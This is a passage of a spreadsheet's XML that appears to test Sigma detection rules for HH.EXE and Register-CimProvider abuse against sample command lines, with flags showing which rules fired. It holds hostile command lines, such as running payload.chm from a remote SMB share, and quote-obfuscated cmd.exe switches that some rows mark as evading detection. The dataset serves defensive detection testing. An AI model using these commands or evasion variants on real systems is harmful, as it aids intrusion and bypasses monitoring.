        </is>
      </c>
      <c r="B2080" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2080" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2080" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2080" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F2080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2080" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2080" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2080" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2080" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2081" ht="15.75" customHeight="1" s="42">
      <c r="A2081" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2081" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2081" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2081" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2081" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F2081" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2081" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2081" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2081" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2081" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2081" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2082" ht="15.75" customHeight="1" s="42">
      <c r="A2082" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2082" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2082" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2082" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2082" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2082" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2082" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2082" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2082" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2083" ht="15.75" customHeight="1" s="42">
      <c r="A2083" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2083" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2083" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2083" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2083" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2083" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2083" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2083" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2083" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2084" ht="15.75" customHeight="1" s="42">
      <c r="A2084" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2084" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2084" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2084" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2084" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2084" s="43" t="n"/>
      <c r="J2084" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2084" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2085" ht="15.75" customHeight="1" s="42">
      <c r="A2085" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2085" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2085" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2085" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2085" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2085" s="43" t="n"/>
      <c r="J2085" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2085" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2086" ht="15.75" customHeight="1" s="42">
      <c r="A2086" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2086" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2086" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2086" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2086" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F2086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2086" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2086" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2086" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2086" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2087" ht="15.75" customHeight="1" s="42">
      <c r="A2087" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2087" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2087" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2087" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2087" s="43" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F2087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2087" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2087" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2087" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2087" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2088" ht="15.75" customHeight="1" s="42">
      <c r="A2088" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2088" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2088" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2088" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2088" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F2088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2088" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2088" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2088" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2088" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2089" ht="15.75" customHeight="1" s="42">
      <c r="A2089" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B2089" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2089" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2089" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2089" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F2089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2089" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2089" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2089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089" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2089" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2090" ht="15.75" customHeight="1" s="42">
      <c r="A2090" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2090" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2090" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2090" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2090" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F2090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2090" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2090" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2090" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2090" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2090" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2091" ht="15.75" customHeight="1" s="42">
      <c r="A2091" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2091" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2091" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2091" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2091" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F2091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2091" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2091" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2091" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2091" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2091" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2092" ht="15.75" customHeight="1" s="42">
      <c r="A2092" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2092" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2092" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2092" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2092" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F2092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2092" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2092" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2092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092" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2092" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2093" ht="15.75" customHeight="1" s="42">
      <c r="A2093" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2093" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2093" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2093" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2093" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F2093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2093" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2093" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2093" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2093" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2093" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2094" ht="15.75" customHeight="1" s="42">
      <c r="A2094" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2094" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2094" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2094" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2094" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F2094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2094" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2094" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2094" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2094" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2094" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2095" ht="15.75" customHeight="1" s="42">
      <c r="A2095" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2095" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2095" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2095" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2095" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2095" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2095" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2095" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2095" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2095" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2096" ht="15.75" customHeight="1" s="42">
      <c r="A2096" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2096" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2096" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2096" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2096" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2096" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2096" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2096" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2096" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2096" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2097" ht="15.75" customHeight="1" s="42">
      <c r="A2097" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2097" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2097" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2097" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2097" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2097" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2097" s="43" t="n"/>
      <c r="J2097" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2097" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2098" ht="15.75" customHeight="1" s="42">
      <c r="A2098" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2098" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2098" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2098" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2098" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2098" s="43" t="n"/>
      <c r="J2098" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2098" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2099" ht="15.75" customHeight="1" s="42">
      <c r="A2099" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2099" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2099" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2099" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2099" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F2099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2099" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2099" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2099" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2099" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2099" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2100" ht="15.75" customHeight="1" s="42">
      <c r="A2100" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2100" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2100" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2100" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2100" s="43" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F2100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2100" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2100" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2100" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2100" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2100" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2101" ht="15.75" customHeight="1" s="42">
      <c r="A2101" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2101" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2101" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2101" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2101" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F2101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2101" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2101" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2101" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2101" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2101" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2102" ht="15.75" customHeight="1" s="42">
      <c r="A2102" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B2102" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2102" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2102" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2102" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F2102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2102" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2102" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2102" s="43" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969); Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2102" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2102" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2103" ht="15.75" customHeight="1" s="42">
      <c r="A2103" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B2103" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C2103" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D2103" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E2103" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe  -Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F2103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2103" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J2103" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2103" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2104" ht="15.75" customHeight="1" s="42">
      <c r="A2104" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B2104" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C2104" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D2104" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E2104" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe "-Path" "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F2104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2104" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J2104" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2104" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2105" ht="15.75" customHeight="1" s="42">
      <c r="A2105" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B2105" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C2105" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D2105" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E2105" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe /Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F2105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2105" s="43" t="b">
        <v>1</v>
